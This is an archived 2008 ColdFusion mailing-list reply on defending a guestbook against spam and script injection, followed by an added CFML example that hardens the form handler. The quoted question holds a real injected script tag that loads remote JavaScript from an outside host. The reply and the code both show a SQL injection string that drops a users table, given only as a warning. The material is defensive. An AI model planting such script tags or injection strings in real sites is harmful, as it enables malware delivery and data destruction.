There are a number of things you can do, and in fact I use all of these:

[A] Find out this person's IP address, and if the form is submitted
from that IP address, do nothing.  Don't give them any kind of
feedback at all.  That'll stop this current attack, but since these
idiots usually dart from one IP address to another, it's not enough to
fix the problem.  It only stops today's.  You can find out the IP address
by having your form submit #cgi.remote_addr# in a hidden field.

[B] Pass the form's submitted contents through a regex to eliminate
any HTML.  You can get all kinds of string manipulation scripts
through the library at cflib.org, including one to strip out any HTML.

[C] Use cfformprotect, which (amongst other things) compares the
submission in this form with a database of other form submissions from
other sites, and identifies which ones are spam and which aren't.
When it tells you this is spam, you just throw it away.  Don't tell
the spammer you're throwing it away, because that only helps them
refine their techniques.  Those buggers are agile enough as it is
without us giving them a helping hand.

You can get cfformprotect from http://www.riaforge.org/ .

[D] While you're working in this area, you should make sure you're
using <cfqueryparam if you're processing the form into your database.
I know you haven't described a SQL injection, but it's not a million
miles away from what you do describe.  There's ample documentation in
the ColdFusion docs about <cfqueryparam, and there have been quite a
few blog articles about it lately.  Google for cfqueryparam and
ColdFusion and you'll find them.  Use <cfqueryparam on every (and I
do mean EVERY) parameter you insert into the database, on every insert
or update, if there is likely to be any user input going into that SQL
statement.  That ensures that nobody will be able to enter a
last name as 'Smith)';drop table users' or some such.

I started defending my sites from this kind of script when a
guestbook on a very low-volume site suddenly got 30,000 entries waiting for
editor approval, all with links to sites we might want to go and see,
just like yours has.  Using the techniques I described reduced the
flow from thousands a day to more like 3-4 a week on this little
site.

Hope this helps.


Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month


On Thu, Aug 7, 2008 at 4:04 PM, Michael Suwanto
<[EMAIL PROTECTED]> wrote:
> I'm a ColdFusion noob and my database just got injected with some script.
> So for example one of the database fields would appear something like so:
> Gisella427.jpg"></title><script 
> src="http://jjmaoduo.3322.org/csrss/w.js";></script><!--
>
> I've tried updating the records using a replace command on the fields, but 
> 20 mins later this code pops up again!!!
>
> Any idea on how to fix or prevent this from happening????
> Seriously out of ideas here....
>
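The following action page is an added example, not code from Mike's post or from cfformprotect. It puts points [A], [B] and [D] of the reply above into a single CFML page that a guestbook form posts to: the blocked-address check is done on the action page itself by reading cgi.remote_addr there, HTML tags are stripped from each field with a regex, the value is bound with <cfqueryparam> instead of being concatenated into the INSERT, and stored values are encoded when displayed so an entry that got in before the fix (like the one in the question quoted above) renders as text. The datasource name, the "guestbook" table and its columns, the form field names, and the two blocklisted addresses (RFC 5737 documentation range) are all assumptions made for the example.

```cfml
<!---
  guestbook_action.cfm  --  added example, not code from the original post.
  Applies points [A], [B] and [D] from the reply above on the page a
  guestbook form posts to.
  Assumptions: a datasource in application.dsn, a table "guestbook" with the
  columns used below, form fields "visitor_name", "visitor_url" and "message",
  and a blocklist kept in a plain CF list. The addresses are constructed
  examples from the RFC 5737 documentation range.
--->

<!--- [A] Silently discard posts from addresses already seen spamming.
      cgi.remote_addr is read here, on the action page, so the value is the
      web server's view of the connection, not something the browser sent. --->
<cfset blockedIPs = "203.0.113.7,198.51.100.22">
<cfif listFind(blockedIPs, cgi.remote_addr)>
    <cfabort>   <!--- no message, no redirect: nothing for the spammer to learn from --->
</cfif>

<!--- Require the fields the INSERT needs; cfparam throws if one is missing. --->
<cfparam name="form.visitor_name" type="string">
<cfparam name="form.visitor_url"  type="string" default="">
<cfparam name="form.message"      type="string">

<!--- [B] Strip HTML tags before the values go anywhere near the database.
      The pattern removes every complete <...> sequence. An unterminated "<!--"
      such as the one at the end of the injected payload is not a complete tag,
      so it survives this step; the output encoding at the bottom covers it. --->
<cffunction name="stripTags" returntype="string" output="false">
    <cfargument name="text" type="string" required="true">
    <cfreturn trim(reReplaceNoCase(arguments.text, "<[^>]*>", "", "all"))>
</cffunction>

<cfset cleanName    = left(stripTags(form.visitor_name), 100)>
<cfset cleanURL     = left(stripTags(form.visitor_url), 255)>
<cfset cleanMessage = left(stripTags(form.message), 2000)>

<!--- [D] The pattern to get rid of: values concatenated straight into SQL.
      A visitor_name of   Smith');drop table users--   would close the string
      and the VALUES list and, on a driver that allows statement batching,
      run a second statement. Kept here, commented out, for comparison only.

  <cfquery datasource="#application.dsn#">
      INSERT INTO guestbook (visitor_name, visitor_url, message, remote_ip)
      VALUES ('#cleanName#', '#cleanURL#', '#cleanMessage#', '#cgi.remote_addr#')
  </cfquery>
--->

<!--- [D] Hardened: every user-supplied value is bound with <cfqueryparam>.
      The driver sends the text as a bound parameter, so quotes and semicolons
      in it are data, never SQL. maxlength rejects oversize input outright. --->
<cfquery datasource="#application.dsn#">
    INSERT INTO guestbook (visitor_name, visitor_url, message, remote_ip, posted_at)
    VALUES (
        <cfqueryparam value="#cleanName#"       cfsqltype="cf_sql_varchar" maxlength="100">,
        <cfqueryparam value="#cleanURL#"        cfsqltype="cf_sql_varchar" maxlength="255">,
        <cfqueryparam value="#cleanMessage#"    cfsqltype="cf_sql_varchar" maxlength="2000">,
        <cfqueryparam value="#cgi.remote_addr#" cfsqltype="cf_sql_varchar" maxlength="45">,
        <cfqueryparam value="#now()#"           cfsqltype="cf_sql_timestamp">
    )
</cfquery>

<!--- Output side: encode whatever is in the database at display time, so a
      value that was injected before the fix renders as literal text
      ("&lt;script ...") instead of being executed by the visitor's browser. --->
<cfquery name="entries" datasource="#application.dsn#">
    SELECT visitor_name, message FROM guestbook ORDER BY posted_at DESC
</cfquery>
<cfoutput query="entries">
    <p><strong>#htmlEditFormat(visitor_name)#</strong>: #htmlEditFormat(message)#</p>
</cfoutput>
```

Two things worth noting about the design. Stripping tags on input ([B]) is a spam-volume measure, not a complete defence: run the payload from the question through stripTags and `Gisella427.jpg"<!--` is still left, which is why the display loop encodes every stored value rather than trusting what went in. And <cfqueryparam> fixes the injection path regardless of what the content looks like, so it belongs on every INSERT and UPDATE that touches user input, including the cleanup you do on the already-polluted rows.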


Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310331